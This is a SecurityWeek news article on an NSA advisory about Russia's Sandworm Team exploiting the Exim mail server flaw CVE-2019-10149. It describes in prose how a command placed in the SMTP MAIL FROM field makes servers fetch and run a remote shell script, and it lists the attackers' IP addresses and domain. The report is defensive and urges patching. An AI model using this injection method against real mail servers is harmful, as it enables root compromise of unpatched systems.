CONFERENCE Cyber AI & Automation Summit - NOW LIVE
Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cyberwarfare

NSA Publishes IOCs Associated With Russian Targeting of Exim Servers

The U.S. National Security Agency (NSA) on Thursday published information on the targeting of Exim mail servers by the Russia-linked threat actor known as Sandworm Team.

The U.S. National Security Agency (NSA) on Thursday published information on the targeting of Exim mail servers by the Russia-linked threat actor known as Sandworm Team.

The open-source Exim mail transfer agent (MTA) is used broadly worldwide, powering more than half of the Internet’s email servers and also being pre-installed in some Linux distributions. Roughly 500,000 organizations use Exim within their environments.

In June last year, Exim developers patched CVE-2019-10149, a vulnerability that could allow both local and remote attackers to run arbitrary commands as root. Over 3.5 million machines were found to be at risk at the time, and attacks targeting the flaw emerged soon after.

Now, the NSA says the Russian hackers have been exploiting the vulnerability since at least August 2019, to execute commands and code on affected systems.

“The Russian actors, part of the General Staff Main Intelligence Directorate’s (GRU) Main Center for Special Technologies (GTsST), have used this exploit to add privileged users, disable network security settings, execute additional scripts for further network exploitation; pretty much any attacker’s dream access – as long as that network is using an unpatched version of Exim MTA,” the NSA says.

Also tracked as TeleBots, Sandworm Team is focused on cyber-espionage. The group’s activity largely overlaps with that of APT28 (also known as Pawn Storm, Fancy Bear, Sofacy, Sednit, Tsar Team and Strontium), but the two use different tools and methods.

Sandworm Team, security researchers say, has been targeting European government organizations, media outlets in France and Germany, political opposition groups in Russia, and LGBT organizations with links to Russia. The group was also connected to attacks on Ukraine’s power grid.

In addition, the threat actor is believed to have orchestrated attacks on the 2016 U.S. presidential election, and to be behind the June 2017 NotPetya cyberattack and the VPNFilter botnet.

Advertisement. Scroll to continue reading.

According to the NSA’s advisory, Sandworm Team has been targeting unpatched Exim mail servers, on their victims’ public facing MTAs, by sending a command in the MAIL FROM field of an SMTP (Simple Mail Transfer Protocol) message.

The threat actor would modify parameters in the command based on deployment. Successful exploitation of CVE-2019-10149 would result in the victim machine downloading and executing a shell script from a Sandworm-controlled domain.

Since at least August 2019, Sandworm Team was observed launching such attacks from two IP addresses and one domain: 95.216.13.196, 103.94.157.5, and hostapp(.)be, the NSA explains.

“Update Exim immediately by installing version 4.93 or newer to mitigate this and other vulnerabilities. Other vulnerabilities exist and are likely to be exploited, so the latest fully patched version should be used. Using a previous version of Exim leaves a system vulnerable to exploitation,” the NSA warns.

Related: Russian Hackers Target European Governments Ahead of Elections: FireEye

Related: Hackers Target Recent Vulnerability in Exim Mail Server

Related: NSA: Russian Agents Have Been Hacking Major Email Program

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Don’t miss this Live Attack demonstration to learn how hackers operate and gain the knowledge to strengthen your defenses.

Register

Join us as we share best practices for uncovering risks and determining next steps when vetting external resources, implementing solutions, and procuring post-installation support.

Register

People on the Move

Video platform Vimeo has appointed Ryan Weeks as Chief Information Security Officer.

LPL Financial has welcomed Renana Friedlich as Chief Information Security Officer.

SSH Communications Security has appointed Pauli Haikonen as the company’s Chief Information Security Officer (CISO).

More People On The Move

Expert Insights

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest cybersecurity news, threats, and expert insights. Unsubscribe at any time.